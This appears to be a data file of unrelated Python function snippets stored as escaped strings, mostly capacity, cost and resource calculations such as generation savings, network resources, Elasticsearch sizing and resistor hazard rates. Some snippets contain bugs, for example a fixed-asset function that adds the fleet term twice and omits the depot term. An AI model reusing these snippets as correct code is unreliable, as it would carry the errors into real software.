self.load_offset_proposed = 0\n\n offset = self.average_load*\\\n (self.comp_specs['percent generation to offset'] / 100.0)\n #~ print self.forecast.generation['generation hydro'].sum()\n\n # removed on purpose\n #~ hydro = \\\n #~ self.forecast.generation['generation hydro'].fillna(0).sum()\n #~ if hydro > 0:\n #~ offset *= 2\n\n # existing very variable RE\n existing_RE = \\\n int(float(self.cd['wind capacity'])) + \\\n int(float(self.cd['solar capacity']))\n\n if existing_RE < (round(offset/25) * 25): # ???\n #~ print \"True\"\n self.load_offset_proposed = round(offset/25) * 25 - existing_RE\n\n\n\n # not needed for now\n #~ self.total_wind_generation = self.generation_load_proposed + \\\n #~ int(self.comp_specs['wind capacity'])\n\n self.generation_wind_proposed = self.load_offset_proposed * \\\n float(self.comp_specs['capacity factor'])*\\\n constants.hours_per_year\n #~ print 'self.load_offset_proposed',self.load_offset_proposed\n #~ print 'self.generation_wind_proposed',self.generation_wind_proposed", "def calc_pre_intertie_generation (self):\n\n self.pre_intertie_generation = \\\n self.forecast.get_generation(self.start_year,self.end_year)\n\n gen_eff = self.cd[\"diesel generation efficiency\"]\n self.pre_intertie_generation_fuel_used = \\\n self.pre_intertie_generation / gen_eff\n\n #~ print 'self.baseline_generatio',self.baseline_generation", "def calculate_available_node_res (self, vnfs_to_be_left_in_place={},\n mode=MODE_ADD):\n # add available res attribute to all Infras and subtract the running\n # NFs` resources from the given max res\n for n in self.infras:\n setattr(self.network.node[n.id], 'availres',\n copy.deepcopy(self.network.node[n.id].resources))\n if mode == self.MODE_ADD:\n for vnf in self.running_nfs(n.id):\n # if a VNF needs to be left in place, then it is still mapped by the \n # mapping process, but with placement criteria, so 
its resource \n # requirements will be subtracted during the greedy process.\n if vnf.id not in vnfs_to_be_left_in_place:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n self.network.node[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\n \"Infra node`s resources are expected to represent its maximal \"\n \"capabilities.\"\n \"The NodeNF(s) running on Infra node %s, use(s)more resource \"\n \"than the maximal.\" % n.id)\n else:\n try:\n newres = self.network.node[n.id].availres.subtractNodeRes(\n vnfs_to_be_left_in_place[vnf.id].resources,\n self.network.node[n.id].resources)\n except RuntimeError:\n raise RuntimeError(\"VNF %s cannot be kept on host %s with \"\n \"increased resource requirements due to not \"\n \"enough available resources!\" % (vnf.id, n.id))\n\n self.network.node[n.id].availres = newres", "def _cost_caught_by_police(self):\n if self.fine_frequency != 0:\n if self.number_of_courses % self.fine_frequency == 0 and self.number_of_courses != 0:\n if self.number_of_courses % self.fine_frequency_paid_by_driver == 0 and self.number_of_courses != 0:\n self.fine_paid_number_of_courses += 1\n fine_value = np.random.choice([100, 200, 500], p=[0.25, 0.4, 0.35])\n self.total_penalty_points += self._add_penalty_points() # adding penalty points\n return fine_value\n else:\n return 0\n else:\n return 0\n else:\n return 0", "def _cost_refueling(self):\n if self.number_of_courses % self.refueling_frequency == 0 & self.number_of_courses != 0:\n lowest_amount = self.refueling_liter_range[0] # take a minimum value\n highest_amount = self.refueling_liter_range[1] # take a maximum value\n refueled_petrol = randint(lowest_amount, highest_amount)\n cost = refueled_petrol * self.petrol_cost\n return cost\n else:\n return 0", "def required_points(self):\n req_points = self.min_performance * self.initial_available_points()\n return np.maximum(0, np.int64(np.ceil(req_points)))", "def checkFuel(self):\n return self.maze.checkFuelCost(self.checkpoint,currentLap = self.laps) - self.timeDriving", "def quick_ratio(self):\n return (\n self.current_assets - self.inventory_net) / self.current_liabilities", "def support(stock):\n output= stock_min(stock)+(stock_min(stock)*.05)\n return output", "def calculate_br_up_metric(br_up):\n if br_up < 1:\n br_up = 1\n min_baud = 1200\n max_baud = 38400\n\n num = np.log(br_up) - np.log(min_baud)\n den = np.log(max_baud) - np.log(min_baud)\n\n return (num / den + 0.1).clip(min=0, max=1)", "def budget_used(self):\n return int(self.total_spent() / self.budget() * 100.0)", "def calc_annual_electric_savings (self):\n costs = self.comp_specs['diesel generator o&m']\n\n for kW in costs.keys():\n try:\n if self.average_load < int(kW):\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n break\n except ValueError:\n maintenance = self.comp_specs['diesel generator o&m'][kW]\n\n self.baseline_generation_cost = maintenance + \\\n (self.pre_intertie_generation_fuel_used * self.diesel_prices)\n\n maintenance = self.capital_costs * \\\n (self.comp_specs['percent o&m'] / 100.0)\n self.proposed_generation_cost = maintenance + \\\n self.intertie_offset_generation_fuel_used * \\\n self.intertie_diesel_prices\n self.annual_electric_savings = self.baseline_generation_cost -\\\n self.proposed_generation_cost\n #~ print len(self.annual_electric_savings)\n #~ print 'self.annual_electric_savings',self.annual_electric_savings", "def initialize_supply(self):\n unit_count = 0\n for i in 
range(self.start_allocation[0 ] -1, self.start_allocation[1]):\n for j in range(len(self.capacity_list[i][1])):\n self.capacity_list[i][1][j] = 1\n unit_count += 1\n self.total_supply -= unit_count", "def test_loc_techs_resource_capacity_constraint(self, override):\n\n if override is None:\n m = build_model(\n {}, \"simple_supply_and_supply_plus,two_hours,investment_costs\"\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n assert expr.lb == 0\n assert expr.ub == np.inf\n\n else:\n m = build_model(\n {\n \"techs.test_supply_plus.constraints.resource_cap_{}\".format(\n override\n ): 10\n },\n \"simple_supply_and_supply_plus,two_hours,investment_costs\",\n )\n m.run(build_only=True)\n expr = m._backend_model.resource_cap[(\"b\", \"test_supply_plus\")]\n if override == \"max\":\n assert expr.ub == 10\n assert expr.lb == 0\n elif override == \"equals\":\n assert expr.ub == 10\n assert expr.lb == 10\n if override == \"min\":\n assert expr.lb == 10\n assert expr.ub == np.inf", "def _estimate_elasticsearch_requirement(\n instance: Instance,\n desires: CapacityDesires,\n working_set: float,\n reads_per_second: float,\n max_rps_to_disk: int,\n zones_per_region: int = 3,\n copies_per_region: int = 3,\n) -> CapacityRequirement:\n # Keep half of the cores free for background work (merging mostly)\n needed_cores = math.ceil(sqrt_staffed_cores(desires) * 1.5)\n # Keep half of the bandwidth available for backup\n needed_network_mbps = simple_network_mbps(desires) * 2\n\n needed_disk = math.ceil(\n (1.0 / desires.data_shape.estimated_compression_ratio.mid)\n * desires.data_shape.estimated_state_size_gib.mid\n * copies_per_region,\n )\n\n # Rough estimate of how many instances we would need just for the the CPU\n # Note that this is a lower bound, we might end up with more.\n needed_cores = math.ceil(\n max(1, needed_cores // (instance.cpu_ghz / desires.core_reference_ghz))\n )\n rough_count = math.ceil(needed_cores / instance.cpu)\n\n # Generally speaking we want fewer than some number of reads per second\n # hitting disk per instance. 
If we don't have many reads we don't need to\n # hold much data in memory.\n instance_rps = max(1, reads_per_second // rough_count)\n disk_rps = instance_rps * _es_io_per_read(max(1, needed_disk // rough_count))\n rps_working_set = min(1.0, disk_rps / max_rps_to_disk)\n\n # If disk RPS will be smaller than our target because there are no\n # reads, we don't need to hold as much data in memory\n needed_memory = min(working_set, rps_working_set) * needed_disk\n\n # Now convert to per zone\n needed_cores = needed_cores // zones_per_region\n needed_disk = needed_disk // zones_per_region\n needed_memory = int(needed_memory // zones_per_region)\n logger.debug(\n \"Need (cpu, mem, disk, working) = (%s, %s, %s, %f)\",\n needed_cores,\n needed_memory,\n needed_disk,\n working_set,\n )\n\n return CapacityRequirement(\n requirement_type=\"elasticsearch-data-zonal\",\n core_reference_ghz=desires.core_reference_ghz,\n cpu_cores=certain_int(needed_cores),\n mem_gib=certain_float(needed_memory),\n disk_gib=certain_float(needed_disk),\n network_mbps=certain_float(needed_network_mbps),\n context={\n \"working_set\": min(working_set, rps_working_set),\n \"rps_working_set\": rps_working_set,\n \"disk_slo_working_set\": working_set,\n \"replication_factor\": copies_per_region,\n \"compression_ratio\": round(\n 1.0 / desires.data_shape.estimated_compression_ratio.mid, 2\n ),\n \"read_per_second\": reads_per_second,\n },\n )", "def fuel_required(mass):\n return max(math.floor(mass/3) - 2, 0)", "def calculate_217f_part_stress(**attributes): # pylint: disable=R0912, R0914\n _dic_ref_temp = {\n 1: 343.0,\n 2: {\n 1: 343.0,\n 2: 343.0,\n 3: 398.0,\n 4: 398.0\n },\n 3: 298.0,\n 5: 398.0,\n 6: 298.0,\n 7: 298.0,\n 9: 358.0,\n 10: 358.0,\n 11: 313.0,\n 12: 298.0,\n 13: 358.0,\n 14: 343.0,\n 15: 343.0\n }\n _dic_factors = {\n 1: [4.5E-9, 12.0, 1.0, 0.6, 1.0, 1.0],\n 2: {\n 1: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 2: [3.25E-4, 1.0, 3.0, 1.0, 1.0, 1.0],\n 3: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0],\n 4: [5.0E-5, 3.5, 1.0, 1.0, 1.0, 1.0]\n },\n 3: [7.33E-3, 0.202, 2.6, 1.45, 0.89, 1.3],\n 5: [0.0031, 1.0, 10.0, 1.0, 1.0, 1.5],\n 6: [0.00148, 1.0, 2.0, 0.5, 1.0, 1.0],\n 7: [0.00015, 2.64, 1.0, 0.466, 1.0, 1.0],\n 8: [0.021, 0.065, 0.105, 0.0, 0.0, 0.0],\n 9: [0.0062, 1.0, 5.0, 1.0, 1.0, 1.0],\n 10: [0.0735, 1.03, 4.45, 2.74, 3.51, 1.0],\n 11: [0.0398, 0.514, 5.28, 1.44, 4.46, 1.0],\n 12: [0.0481, 0.334, 4.66, 1.47, 2.83, 1.0],\n 13: [0.019, 0.445, 7.3, 2.69, 2.46, 1.0],\n 14: [0.0246, 0.459, 9.3, 2.32, 5.3, 1.0],\n 15: [0.018, 1.0, 7.4, 2.55, 3.6, 1.0]\n }\n _dic_piQ = {\n 1: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 2: [0.03, 0.1, 0.3, 1.0, 5.0, 5.0, 15.0],\n 3: [1.0, 3.0],\n 4: [1.0, 3.0],\n 5: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 6: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 7: [0.03, 0.1, 0.3, 1.0, 5.0, 15.0],\n 8: [1.0, 15.0],\n 9: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 10: [2.5, 5.0],\n 11: [2.0, 4.0],\n 12: [2.0, 4.0],\n 13: [0.02, 0.06, 0.2, 0.6, 3.0, 10.0],\n 14: [2.5, 5.0],\n 15: [2.0, 4.0]\n }\n _dic_piE = {\n 1: [\n 1.0, 3.0, 8.0, 5.0, 13.0, 4.0, 5.0, 7.0, 11.0, 19.0, 0.5, 11.0,\n 27.0, 490.0\n ],\n 2: [\n 1.0, 2.0, 8.0, 4.0, 14.0, 4.0, 8.0, 10.0, 18.0, 19.0, 0.2, 10.0,\n 28.0, 510.0\n ],\n 3: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 4: [\n 1.0, 2.0, 10.0, 5.0, 17.0, 6.0, 8.0, 14.0, 18.0, 25.0, 0.5, 14.0,\n 36.0, 660.0\n ],\n 5: [\n 1.0, 2.0, 11.0, 5.0, 18.0, 15.0, 18.0, 28.0, 35.0, 27.0, 0.8, 14.0,\n 38.0, 610.0\n ],\n 6: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 
0.3, 13.0,\n 34.0, 610.0\n ],\n 7: [\n 1.0, 2.0, 10.0, 5.0, 16.0, 4.0, 8.0, 9.0, 18.0, 23.0, 0.5, 13.0,\n 34.0, 610.0\n ],\n 8: [\n 1.0, 5.0, 21.0, 11.0, 24.0, 11.0, 30.0, 16.0, 42.0, 37.0, 0.5,\n 20.0, 53.0, 950.0\n ],\n 9: [\n 1.0, 2.0, 12.0, 6.0, 20.0, 5.0, 8.0, 9.0, 15.0, 33.0, 0.5, 18.0,\n 48.0, 870.0\n ],\n 10: [\n 1.0, 2.0, 18.0, 8.0, 30.0, 8.0, 12.0, 13.0, 18.0, 53.0, 0.5, 29.0,\n 76.0, 1400.0\n ],\n 11: [\n 1.0, 2.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 12: [\n 1.0, 3.0, 16.0, 7.0, 28.0, 8.0, 12.0, 0.0, 0.0, 38.0, 0.5, 0.0,\n 0.0, 0.0\n ],\n 13: [\n 1.0, 3.0, 14.0, 6.0, 24.0, 5.0, 7.0, 12.0, 18.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ],\n 14: [\n 1.0, 2.0, 19.0, 8.0, 29.0, 40.0, 65.0, 48.0, 78.0, 46.0, 0.5, 25.0,\n 66.0, 1200.0\n ],\n 15: [\n 1.0, 3.0, 14.0, 7.0, 24.0, 6.0, 12.0, 20.0, 30.0, 39.0, 0.5, 22.0,\n 57.0, 1000.0\n ]\n }\n # Resistance factor (piR) dictionary of values. The key is the\n # subcategory ID. The index in the returned list is the resistance range\n # breakpoint (breakpoint values are in _lst_breakpoints below). For\n # subcategory ID 6 and 7, the specification ID selects the correct set of\n # lists, then the style ID selects the proper list of piR values and then\n # the resistance range breakpoint is used to select\n _dic_piR = {\n 1: [1.0, 1.1, 1.6, 2.5],\n 2: [1.0, 1.1, 1.6, 2.5],\n 3: [1.0, 1.2, 1.3, 3.5],\n 5: [1.0, 1.7, 3.0, 5.0],\n 6: [[[1.0, 1.0, 1.2, 1.2, 1.6, 1.6, 1.6,\n 0.0], [1.0, 1.0, 1.0, 1.2, 1.6, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.0, 1.2, 1.2, 1.2,\n 1.6], [1.0, 1.2, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0],\n [1.0, 1.6, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.6, 1.6, 0.0, 0.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.1, 1.2, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0, 0.0, 0.0]],\n [[1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.2, 1.6, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.0, 2.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [1.0, 1.2, 1.4, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.6, 0.0, 0.0, 0.0], [1.0, 1.0, 1.2, 2.0, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.6, 0.0, 0.0\n ], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.2, 0.0, 0.0],\n [1.0, 1.0, 1.4, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 0.0, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0],\n [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 0.0, 0.0], [\n 1.0, 1.0, 1.2, 1.5, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.0, 1.4, 1.6, 0.0],\n [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [1.0, 1.0, 1.0, 1.4, 1.6, 2.0], [\n 1.0, 1.0, 1.4, 2.4, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 2.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 1.0, 0.0, 0.0,\n 0.0], [1.0, 1.0, 0.0, 0.0, 0.0, 0.0], [\n 1.0, 1.2, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.0, 1.2, 1.6, 0.0,\n 0.0], [1.0, 1.0, 1.0, 1.6, 0.0, 0.0], [\n 1.0, 1.0, 1.4, 0.0, 0.0, 0.0\n ], [1.0, 1.2, 1.5, 0.0, 0.0,\n 0.0], [1.0, 1.2, 0.0, 0.0, 0.0, 0.0]]],\n 7: [[[1.0, 1.2, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.2, 1.6, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.2, 1.6],\n [1.0, 1.0, 1.0, 1.0, 1.2, 1.6], [1.0, 1.0, 1.0, 1.0, 1.2, 1.6]],\n [[1.0, 1.2, 1.6, 0.0, 0.0, 0.0], [1.0, 1.2, 1.6, 0.0, 0.0, 0.0],\n [1.0, 1.0, 1.2, 1.6, 0.0, 0.0], [1.0, 1.0, 1.1, 1.2, 1.4, 0.0],\n [1.0, 1.0, 1.0, 1.2, 1.6, 0.0], [1.0, 1.0, 1.0, 1.1, 1.4, 0.0]]],\n 9: [1.0, 1.4, 2.0],\n 10: [1.0, 1.1, 1.4, 2.0, 2.5, 3.5],\n 11: [1.0, 1.4, 2.0],\n 12: [1.0, 1.4, 2.0],\n 13: [1.0, 1.1, 1.2, 1.4, 1.8],\n 14: [1.0, 1.1, 1.2, 1.4, 1.8],\n 15: 
[1.0, 1.1, 1.2, 1.4, 1.8]\n }\n # Dictionary containing the number of element breakpoints for determining\n # the resistance factor list to use.\n _dic_breakpoints = {\n 1: [1.0E5, 1.0E6, 1.0E7],\n 2: [1.0E5, 1.0E6, 1.0E7],\n 3: [100.0, 1.0E5, 1.0E6],\n 5: [1.0E4, 1.0E5, 1.0E6],\n 6: [[500.0, 1.0E3, 5.0E3, 7.5E3, 1.0E4, 1.5E4, 2.0E4],\n [100.0, 1.0E3, 1.0E4, 1.0E5, 1.5E5, 2.0E5]],\n 7: [500.0, 1.0E3, 5.0E3, 1.0E4, 2.0E4],\n 9: [2.0E3, 5.0E3],\n 10: [1.0E4, 2.0E4, 5.0E4, 1.0E5, 2.0E5],\n 11: [2.0E3, 5.0E3],\n 12: [2.0E3, 5.0E3],\n 13: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 14: [5.0E4, 1.0E5, 2.0E5, 5.0E5],\n 15: [1.0E4, 5.0E4, 2.0E5, 1.0E6]\n }\n _dic_piV = {\n 9: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 10: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 11: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 12: [1.1, 1.05, 1.0, 1.1, 1.22, 1.4, 2.0],\n 13: [1.0, 1.05, 1.2],\n 14: [1.0, 1.05, 1.2],\n 15: [1.0, 1.05, 1.2]\n }\n _dic_piC = {10: [2.0, 1.0, 3.0, 1.5], 12: [2.0, 1.0]}\n _msg = ''\n\n # Calculate the base hazard rate.\n if attributes['subcategory_id'] == 2:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']][attributes[\n 'specification_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][attributes[\n 'specification_id']][5]\n elif attributes['subcategory_id'] not in [4, 8]:\n _ref_temp = _dic_ref_temp[attributes['subcategory_id']]\n _f0 = _dic_factors[attributes['subcategory_id']][0]\n _f1 = _dic_factors[attributes['subcategory_id']][1]\n _f2 = _dic_factors[attributes['subcategory_id']][2]\n _f3 = _dic_factors[attributes['subcategory_id']][3]\n _f4 = _dic_factors[attributes['subcategory_id']][4]\n _f5 = _dic_factors[attributes['subcategory_id']][5]\n\n if attributes['subcategory_id'] == 4:\n attributes['lambda_b'] = 0.00006\n elif attributes['subcategory_id'] == 8:\n attributes['lambda_b'] = _dic_factors[attributes['subcategory_id']][\n attributes['type_id'] - 1]\n else:\n attributes['lambda_b'] = _f0 * exp(_f1 * (\n (attributes['temperature_active'] + 273.0) /\n _ref_temp))**_f2 * exp(((attributes['power_ratio'] / _f3) * (\n (attributes['temperature_active'] + 273.0) / 273.0)**_f4)**_f5)\n\n if attributes['lambda_b'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: Base hazard rate is 0.0 when ' \\\n 'calculating resistor, hardware ID: ' \\\n '{0:d}'.format(attributes['hardware_id'])\n\n # Calculate the resistance factor (piR).\n if attributes['subcategory_id'] not in [4, 8]:\n _index = -1\n if attributes['subcategory_id'] == 6:\n _breaks = _dic_breakpoints[attributes['subcategory_id']][\n attributes['specification_id'] - 1]\n else:\n _breaks = _dic_breakpoints[attributes['subcategory_id']]\n\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['n_elements']\n if len(_breaks) == 1 and _diff < 0:\n break\n elif _diff >= 0:\n break\n\n if attributes['subcategory_id'] in [6, 7]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][\n attributes['specification_id'] - 1][attributes['family_id'] -\n 1][_index + 1]\n elif attributes['subcategory_id'] not in [4, 8]:\n attributes['piR'] = _dic_piR[attributes['subcategory_id']][_index +\n 
1]\n\n # Determine the quality factor (piQ).\n attributes['piQ'] = _dic_piQ[attributes['subcategory_id']][\n attributes['quality_id'] - 1]\n\n if attributes['piQ'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piQ is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Determine the environmental factor (piE).\n attributes['piE'] = _dic_piE[attributes['subcategory_id']][\n attributes['environment_active_id'] - 1]\n\n if attributes['piE'] <= 0.0:\n _msg = _msg + 'RAMSTK WARNING: piE is 0.0 when calculating ' \\\n 'resistor, hardware ID: {0:d}'.format(attributes['hardware_id'])\n\n # Calculate the temperature factor (piT).\n if attributes['subcategory_id'] == 4:\n attributes['temperature_case'] = (attributes['temperature_active'] +\n 55.0 * attributes['power_ratio'])\n attributes['piT'] = exp(-4056.0 * (\n (1.0 / (attributes['temperature_case'] + 273.0)) - 1.0 / 298.0))\n\n # Calculate the taps factor (piTAPS).\n if attributes['subcategory_id'] in [9, 10, 11, 12, 13, 14, 15]:\n attributes['piTAPS'] = (attributes['n_elements']**1.5 / 25.0) + 0.792\n\n # Calculate the voltage factor (piV).\n if attributes['subcategory_id'] > 8:\n _index = -1\n if attributes['subcategory_id'] in [9, 10, 11, 12]:\n _breaks = [0.1, 0.2, 0.6, 0.7, 0.8, 0.9]\n elif attributes['subcategory_id'] in [13, 14, 15]:\n _breaks = [0.8, 0.9]\n for _index, _value in enumerate(_breaks):\n _diff = _value - attributes['voltage_ratio']\n if len(_breaks) == 1 and _diff < 0.0:\n break\n elif _index == 0 and _diff >= 0.0:\n break\n elif _diff >= 0:\n break\n attributes['piV'] = _dic_piV[attributes['subcategory_id']][_index]\n\n # Determine the consruction class factor (piC).\n if attributes['subcategory_id'] in [10, 12]:\n attributes['piC'] = _dic_piC[attributes['subcategory_id']][\n attributes['construction_id'] - 1]\n\n # Calculate the active hazard rate.\n attributes['hazard_rate_active'] = (\n attributes['lambda_b'] * attributes['piQ'] * attributes['piE'])\n if attributes['subcategory_id'] == 4:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piT'] *\n attributes['n_elements'])\n elif attributes['subcategory_id'] in [9, 11, 13, 14, 15]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] in [10, 12]:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piTAPS'] *\n attributes['piC'] * attributes['piR'] * attributes['piV'])\n elif attributes['subcategory_id'] != 8:\n attributes['hazard_rate_active'] = (\n attributes['hazard_rate_active'] * attributes['piR'])\n\n return attributes, _msg", "def weight(self):\n counters = [\n (\"total_mhz\", self.dominfo.vms_online + self.dominfo.cpus_online / 4.0),\n (\"memory\", self.dominfo.vms_online + self.dominfo.ram_online / 4096.0),\n ]\n load_w = sum((self.node[k] / float(v or 1)) / self.node[k] for k, v in counters)\n return load_w * self.srv_weight", "def calc_boiler_const(Q_load_Wh, thermal_efficiency):\n Q_fuel_Wh = Q_load_Wh / thermal_efficiency\n Q_losses_Wh = Q_fuel_Wh - Q_load_Wh\n\n return Q_fuel_Wh, Q_losses_Wh", "def exceeds_shelf_capacity(shelf, fabric):\n shelf_total = Decimal(shelf.fabrics.all().aggregate(Sum('quantity_th'))['quantity_th__sum'] or 0)\n return True if (shelf_total) + fabric.quantity > max_shelf_qty else False", "def selling_price(self):\n # If a system can't produce something, its price is zero.\n _good = self.tradeitem\n if 
self.planet.tech_level < _good.tp and _good.name not in 'fuel':\n sell_price = 0\n else:\n sell_price = self.standard_init_price()\n # raise a bit, randomized\n sell_price = sell_price + random.randrange(self.tradeitem.var)\n\n return int(sell_price)", "def find_free(min_=0):\n while is_occupied(min_):\n min_ += 1\n return min_", "def calculate_available_link_res (self, sg_hops_to_be_ignored, mode=MODE_ADD):\n # set availbandwidth to the maximal value\n for i, j, k, d in self.network.edges_iter(data=True, keys=True):\n if d.type == 'STATIC':\n setattr(self.network[i][j][k], 'availbandwidth', d.bandwidth)\n # subtract the reserved link and internal (inside Infras) bandwidth\n if mode == self.MODE_ADD:\n for d in self.infras:\n for p in d.ports:\n for fr in p.flowrules:\n if fr.id not in sg_hops_to_be_ignored and fr.bandwidth is not None:\n # Flowrules are cummulatively subtracted from the switching \n # capacity of the node.\n d.availres['bandwidth'] -= fr.bandwidth\n if d.availres['bandwidth'] < 0:\n raise RuntimeError(\"The node bandwidth of %s got below zero \"\n \"during available resource calculation!\" %\n d.id)\n # Get all the mapped paths of all SGHops from the NFFG\n sg_map = NFFGToolBox.get_all_sghop_info(self, return_paths=True)\n for sg_hop_id, data in sg_map.iteritems():\n src, dst, flowclass, bandwidth, delay, path = data\n if bandwidth is not None:\n for link in path:\n link.availbandwidth -= bandwidth\n if link.availbandwidth < 0:\n raise RuntimeError(\n \"The link bandwidth of %s got below zero during\"\n \"available resource calculation!\" % link.id)", "def available_capacity(self):\r\n return self.capacity - len(self.passengers)", "def get_amount_out(amount_in, reserve_in, reserve_out):\n assert amount_in > 0\n assert reserve_in > 0 and reserve_out > 0\n amount_in_with_fee = amount_in*997\n numerator = amount_in_with_fee*reserve_out\n denominator = reserve_in*1000 + amount_in_with_fee\n return float(numerator/denominator)", "def calc_reduction_diesel_used (self):\n self.reduction_diesel_used = self.diesel_equiv_captured - \\\n self.loss_heat_recovery\n #~ print 'self.reduction_diesel_used',self.reduction_diesel_used", "def load_factor(self) -> float:\n return self.filled_count / self.table_size", "def scale_blackhurst_results_to_usgs_values(\n df_load, attr, download_FBA_if_missing):\n # determine national level published withdrawal data for usgs mining\n # in FBS method year\n pv_load = load_fba_w_standardized_units(\n datasource=\"USGS_NWIS_WU\", year=str(attr['helper_source_year']),\n flowclass='Water', download_FBA_if_missing=download_FBA_if_missing)\n\n pv_sub = pv_load[(pv_load['ActivityConsumedBy'] == 'Mining') &\n (pv_load['Compartment'] == 'total') &\n (pv_load['FlowName'] == 'total')].reset_index(drop=True)\n # rename the published value flow name and merge with Blackhurst data\n pv_sub = pv_sub.rename(columns={'FlowAmount': 'pv'})\n df = df_load.merge(pv_sub[['Location', 'pv']], how='left')\n # calculate the difference between published value and allocated value\n # for each naics length\n df = df.assign(nLen=df['SectorConsumedBy'].apply(lambda x: len(x)))\n # calculate initial FlowAmount accounted for\n df = df.assign(av=df.groupby('nLen')['FlowAmount'].transform('sum'))\n # calc difference\n df = df.assign(vd=df['pv'] - df['av'])\n\n # subset df to scale into oil and non-oil sectors\n df['sector_label'] = np.where(df['SectorConsumedBy'].apply(\n lambda x: x[0:5] == '21111'), 'oil', 'nonoil')\n df['ratio'] = np.where(df['sector_label'] == 'oil', 2 / 3, 1 / 
3)\n df['label_sum'] = df.groupby(['Location', 'nLen', 'sector_label'])[\n 'FlowAmount'].transform('sum')\n\n # calculate revised water withdrawal allocation\n df_scaled = df.copy()\n df_scaled.loc[:, 'FlowAmount'] = \\\n df_scaled['FlowAmount'] + \\\n (df_scaled['FlowAmount'] / df_scaled['label_sum']) * \\\n (df_scaled['ratio'] * df_scaled['vd'])\n df_scaled = df_scaled.drop(columns=['sector_label', 'ratio', 'nLen',\n 'label_sum', 'pv', 'av', 'vd'])\n\n return df_scaled", "def new_capacity_rule(mod, g, p):\n return 0", "def _get_observation_lower_bound(self):\n lower_bound = -self._get_observation_upper_bound()\n lower_bound[-7] = 0.0\n lower_bound[-2:] = [self.min_speed, self.min_side_speed]\n return lower_bound", "def new_fixed_assets(self) -> float:\n old_depot_ppe = (\n self.balance_sheet.assets.of_which_pe * self.inputs.ppe_pct_depot\n )\n old_fleet_net_value = self.balance_sheet.assets.of_which_fleet\n\n adjustment_factor = (\n self.inputs.trucks_total / self.operations.productivity.avg_num_trucks - 1\n )\n incremental_depot = old_depot_ppe * adjustment_factor\n incremental_fleet = old_fleet_net_value * adjustment_factor\n return incremental_fleet + incremental_fleet", "def branching_factor(data, loc):\n\n return 20", "def __call__(self, auctioneer):\n curr_bid = auctioneer.current_bid\n bid_price = curr_bid * self._bid_increase_perc\n if bid_price <= self._budget and self.get_bid_probability() > 0.3:\n self._highest_bid = bid_price\n return bid_price\n return 